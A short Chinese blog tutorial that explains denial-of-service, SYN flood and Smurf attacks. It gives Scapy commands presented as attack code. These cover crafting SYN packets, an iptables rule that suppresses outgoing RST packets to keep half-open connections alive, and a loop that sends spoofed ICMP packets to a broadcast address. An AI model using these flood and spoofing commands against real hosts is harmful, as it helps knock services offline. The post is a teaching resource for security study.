Dos拒绝服务Syn-Flood泛洪攻击--Smurf 攻击(一)

Dos拒绝服务
利用程序漏洞或一对一资源耗尽的Denial of Service 拒绝服务
DDos 分布式拒绝服务 多对一

 


 

Syn-Flood泛洪攻击

发送syn包欺骗服务器建立半连接

攻击代码,利用scapy

Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())

防火墙配置关闭本机发送rst包

RST包的作用:告诉服务器我不和你建立连接,计算机在接收到服务器的ack+syn包的时候,系统会自动发送RST

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,关闭本地发送Rst包
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //查看本机tcp连接数

 

 

Smurf 攻击
最古老的DDos攻击技术
技术原理:利用icmp包,伪造源IP发广播包,广播局域网内的所有计算机回复广播包给伪造的IP,造成攻击对伪造IP的效果
对现在的操作系统几乎无效(不响应广播包)

攻击实现代码:

Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)

 

posted @ 2020-09-14 19:20  包子TT  阅读(1157)  评论(0编辑  收藏  举报